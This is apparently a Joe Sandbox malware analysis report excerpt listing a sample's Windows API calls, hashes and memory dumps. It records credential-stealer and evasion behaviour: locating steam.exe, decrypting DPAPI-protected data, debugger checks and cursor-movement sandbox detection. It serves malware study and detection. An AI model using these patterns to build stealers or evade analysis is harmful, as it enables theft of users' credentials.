                                                                                                                                                                                                                                                    • Instruction ID: c5584129d68d3f1f15f3964f4bf00ef272dcf60dceacc83a9f604d2b561ac107
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c96dfccbac96231e21a8e4109e8825dc9a36b00a4ded0dbdb277477a508a3d72
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D81E97190051C9FCF60FB74EC4AADD77B8AB04314F8501A1E888A7252EB349E599FD1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __EH_prolog3_catch_GS.LIBCMT ref: 000924B2
                                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000924D4
                                                                                                                                                                                                                                                    • Process32First.KERNEL32(00000000,00000128), ref: 000924E4
                                                                                                                                                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 000924F6
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00092508
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00092521
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                    • String ID: steam.exe
                                                                                                                                                                                                                                                    • API String ID: 1799959500-2826358650
                                                                                                                                                                                                                                                    • Opcode ID: 19a9f817ffe153850d95c84f4c8f8200ca5de700e24f62ec503c00a2b7469c43
                                                                                                                                                                                                                                                    • Instruction ID: eaf6df38ef4735d64a6468574ae3347d63103d2939d2c594430b8cf9f2858048
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19a9f817ffe153850d95c84f4c8f8200ca5de700e24f62ec503c00a2b7469c43
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C501E170902115EFDF60AFA4EC49BDE77F8AF05350F5501E5E409E6190EB349E419B51
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • OpenInputDesktop.USER32(00000000,00000001,80000000), ref: 00081823
                                                                                                                                                                                                                                                    • SetThreadDesktop.USER32(00000000), ref: 0008182A
                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 0008183A
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0008184A
                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00081859
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00002710), ref: 0008186B
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 00081870
                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 0008187F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CursorSleep$Desktop$InputOpenThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3283940658-0
                                                                                                                                                                                                                                                    • Opcode ID: 924e730e223d16f0dde4b232d18bb27703f9618d32ce829bdb98fc163e1ea46f
                                                                                                                                                                                                                                                    • Instruction ID: f93b9aede91c05b805123c6861be8782840dddd7121c5ed24cd4cbafc2bcb1ea
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 924e730e223d16f0dde4b232d18bb27703f9618d32ce829bdb98fc163e1ea46f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B110A31E10219EBDB60EBA4CD8ABEE77BDBF44351F240966D541A2080DB74EA46CB61
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 0008A815
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0008AAE7), ref: 0008A830
                                                                                                                                                                                                                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0008A838
                                                                                                                                                                                                                                                    • _memmove.LIBCMT ref: 0008A8BB
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(000B6803,000B6807,?,00000000,00000000,00000000,00000000,00000014,?,0008AAE7), ref: 0008A8E5
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(000B6803,000B680E,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0008AAE7), ref: 0008A8FB
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$BinaryCryptString_memmove_memsetlstrlen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 943939369-0
                                                                                                                                                                                                                                                    • Opcode ID: 4987f548ab4eddbf5aa055e53017704f82bf154d1cf8c4e33aa041808ffca417
                                                                                                                                                                                                                                                    • Instruction ID: 44f1c34214b81923e78c92126a4867c39cf076113f62f9d5f65493928b731b91
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4987f548ab4eddbf5aa055e53017704f82bf154d1cf8c4e33aa041808ffca417
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96311BB1D0411AAFDB10AB64ED889FEB7B8AF09340F4500B6B509A6141EB745E859F62
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,000AB735,?,000A84E6,?,000000BC,?), ref: 000AB10B
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,000AB735,?,000A84E6,?,000000BC,?), ref: 000AB134
                                                                                                                                                                                                                                                    • GetACP.KERNEL32(?,?,000AB735,?,000A84E6,?,000000BC,?), ref: 000AB148
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                                                                                                                    • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                    • Opcode ID: 00fd78ebc74ed70801bf2a4eb3a7d2eec8e5428f297d3f68882808ddb88f25e4
                                                                                                                                                                                                                                                    • Instruction ID: cf3b9b4791b699f54dfe46ad1e92a8bad36b6f3f39d7b621117186d8d04aee3f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00fd78ebc74ed70801bf2a4eb3a7d2eec8e5428f297d3f68882808ddb88f25e4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5301F731601606BAEB659BA4EC16FDF37E8DF06369F500169F201E40C3EB64CE41D654
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 0009D44E
                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0009D463
                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(000B332C), ref: 0009D46E
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 0009D48A
                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 0009D491
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2579439406-0
                                                                                                                                                                                                                                                    • Opcode ID: 2607cfbec3df130bc535292fe3e9335a756be86b8178cf5a5439a659ff949b3c
                                                                                                                                                                                                                                                    • Instruction ID: 8d5b298d8f15f53821f4381a9f4f301682fabe10d2f02c9d6586f0b49112c2fd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2607cfbec3df130bc535292fe3e9335a756be86b8178cf5a5439a659ff949b3c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A21C3B8852300EFF740EF68FD486A47BB4FB68304F10851BE91887260E7B899818F65
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0008823B), ref: 000880C4
                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,0008823B,?,?,0008823B,0008CB95,?,?,?,?,?,?,?,0008CC90,?,?), ref: 000880D8
                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(0008CB95,?,?,0008823B,0008CB95,?,?,?,?,?,?,?,0008CC90,?,?), ref: 000880FD
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                                                                    • String ID: DPAPI
                                                                                                                                                                                                                                                    • API String ID: 2068576380-1690256801
                                                                                                                                                                                                                                                    • Opcode ID: d61e9c4222b463a1e031dcc187fb41231df0bcb94f49f61feb90d8bcd4798180
                                                                                                                                                                                                                                                    • Instruction ID: 50a65be5faeec108013de7663cc08afb88cac270ab14333a5316d638410cdb4e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d61e9c4222b463a1e031dcc187fb41231df0bcb94f49f61feb90d8bcd4798180
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3701FFB5E05218EFCF40EFA8D98889EBBB9FF48754B118466E906E7340D7719E05CB90
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,002DE908,?,?,?,000928A1,?,?,00000000), ref: 00091E7D
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,000928A1,?,?,00000000), ref: 00091E8A
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,000928A1,?,?,00000000), ref: 00091E91
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
